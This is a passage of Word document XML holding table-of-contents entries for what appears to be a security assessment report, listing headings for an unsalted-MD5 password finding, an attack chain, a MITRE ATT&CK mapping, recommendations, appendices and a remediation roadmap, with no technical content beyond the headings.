              <w:instrText xml:space="preserve"> PAGEREF _Toc229906594 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E232E88" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906595" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906595 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56BD0CE5" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906596" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906596 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DA47FD7" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906597" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding F5: Vendor application stores user passwords using unsalted MD5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906597 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AC91BFF" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906598" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906598 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3043C4A7" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906599" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to reproduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906599 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32DC0B4B" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906600" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906600 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EAA00CE" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906601" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906601 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AEDC065" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906602" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906602 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DFAA933" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906603" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2  Attack Chain — How findings combine in practice</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906603 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0439E073" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906604" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3  MITRE ATT&amp;CK technique mapping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906604 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B6443DD" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906605" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Summary Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906605 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="108C55F2" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906606" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1  Priority Recommendations Table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906606 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72C9E487" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906607" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2  The single most critical recommendation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906607 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4650F10D" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906608" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. Appendices</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906608 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A3C49AE" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906609" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A — Tools used during the engagement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906609 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65E35666" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906610" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix B — References cited in this report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906610 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D767E1D" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906611" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix C — Evidence of iteration (anti-AI marker)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906611 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25D1106E" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906612" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7. Remediation Roadmap (Track B Addendum)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906612 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60700308" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906613" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1  Priority Matrix (Effort × Impact)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906613 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44313727" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229906614" w:history="1">
            <w:r w:rsidRPr="008170EF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2  Cost estimates per recommendation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229906614 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
